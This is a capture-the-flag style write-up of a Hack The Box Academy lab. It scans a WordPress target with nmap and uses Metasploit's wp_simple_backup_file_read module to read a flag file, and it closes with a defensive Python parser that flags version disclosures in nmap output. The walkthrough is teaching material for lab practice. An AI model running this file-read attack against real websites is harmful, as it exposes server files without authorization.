Getting Started
Public Exploits
One thing that frustrates me a bit when it comes to HTB Academy is that it practically forces you to buy the yearly, that way you can actually "learn" how to do the class. Therefore, I figured I might as well do some write-ups for anyone who needs help.
Firstly, make sure to spawn the target in, in my case,

Something to note about Hack The Box targets that isn't mentioned within the academy is that the port number you are given is where the vulnerable service is listening. It's a neat little hint for things like this.
The previous lessons taught us about nmap; the first command that should be run is
sudo nmap -A -p 47782 94.237.58.137
Side note: if you want to know the "proper" way to scan for the ports, just run nmap -sV -sC -p- [Target IP]. It might take a bit, though.
The -A flag does an "aggressive" scan, which does all of the following without requiring us to pass each flag separately:
- OS Detection (-O): Attempts to identify the operating system running on the target.
- Version Detection (-sV): Probes open ports to determine what specific service and version number are running (e.g., Apache 2.4.41 instead of just "http").
- Script Scanning (-sC): Runs a collection of default Nmap Scripting Engine (NSE) scripts to check for common vulnerabilities or gather more information about services.
- Traceroute (--traceroute): Maps the network path from your machine to the target host.
Additionally, the -p flag restricts the scan to the specified port.
└──╼ [★]$ sudo nmap -A -p 47782 94.237.58.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 05:33 CST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 94-237-58-137.uk-lon1.upcloud.host (94.237.58.137)
Host is up (0.00046s latency).

PORT      STATE SERVICE VERSION
47782/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|proxy server|VoIP phone|WAP|general purpose|webcam
Running (JUST GUESSING): Google Android 4.4.X|4.0.X (92%), WebSense embedded (91%), Linux 3.X (91%), Cisco embedded (91%), Linksys embedded (91%), AXIS embedded (89%)
OS CPE: cpe:/o:google:android:4.4.0 cpe:/o:linux:linux_kernel cpe:/h:cisco:cp-dx80 cpe:/o:google:android cpe:/h:linksys:ea3500 cpe:/o:linux:linux_kernel:3 cpe:/o:google:android:4.0.4
Aggressive OS guesses: Android 4.4.0 (92%), Websense Content Gateway (91%), Cisco CP-DX80 collaboration endpoint (Android) (91%), Linksys EA3500 WAP (91%), Linux 3.6 - 3.10 (90%), Axis M3006-V network camera (89%), Android 4.0.4 (Linux 2.6) (89%), Linux 2.6.18 - 2.6.24 (89%), Linux 3.16 (89%), Suga embedded WiFi module (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops

TRACEROUTE (using port 47782/tcp)
HOP RTT     ADDRESS
1   0.13 ms 94.237.48.1
2   0.23 ms 100.69.43.225
3   0.25 ms 172.17.252.33
4   0.25 ms 172.17.252.38
5   0.23 ms 100.69.45.147
6   0.38 ms 94-237-58-137.uk-lon1.upcloud.host (94.237.58.137)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.15 seconds
Here we can see it's "Just Another Wordpress Site". Therefore, if we try to go to the domain:

Now it's time to use Metasploit and see what we can do.
msfconsole
Next, we need to search for an exploit. Rather than trying to be extremely complex, let's just look for WordPress and the plugin that's quite literally... on the screen.
search WordPress 2.7.10
From there we will see output listing the matching exploits; there will only be one.
use auxiliary/scanner/http/wp_simple_backup_file_read
Then, like in previous tutorials, we need to see what kind of information we must put in to use the exploit, therefore:
show options
Here we see that we need to set RHOST, RPORT, and FILEPATH. Therefore:
set RHOST [TARGET IP]
set RPORT [TARGET PORT]
set FILEPATH flag.txt
Afterwards, simply type exploit.
Then you can type exit once it has executed, and find the file that you requested within your file manager. In my case it was just in the home directory and contained the flag.
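An added example (not part of the original write-up): the nmap output earlier on this page gives away the Apache and WordPress versions in three separate fields. This Python sketch parses the service section of that output and lists every field that discloses a version number, which is what a site owner would want to suppress or keep patched. The function names are assumptions of this example, and the sample input is the port section copied from the scan above.

```python
import re

# Sample input: the service section of the scan output shown on this page.
SAMPLE = """\
PORT      STATE SERVICE VERSION
47782/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|[_ ]?\s*([\w-]+):\s*(.*)$")
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")  # dotted version such as 2.4.41


def parse_services(text):
    """Return one dict per port line, with its NSE script results attached."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, banner = m.groups()
            services.append({"port": int(port), "proto": proto, "state": state,
                             "service": name, "banner": banner.strip(),
                             "scripts": {}})
            continue
        m = SCRIPT_RE.match(line)
        if m and services:  # script lines belong to the last port seen
            services[-1]["scripts"][m.group(1)] = m.group(2).strip()
    return services


def version_disclosures(services):
    """List (port, source, value) for every field that reveals a version."""
    findings = []
    for svc in services:
        fields = {"banner": svc["banner"], **svc["scripts"]}
        for source, value in fields.items():
            if VERSION_RE.search(value):
                findings.append((svc["port"], source, value))
    return findings


if __name__ == "__main__":
    for port, source, value in version_disclosures(parse_services(SAMPLE)):
        print(f"{port}: {source} discloses {value}")
```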
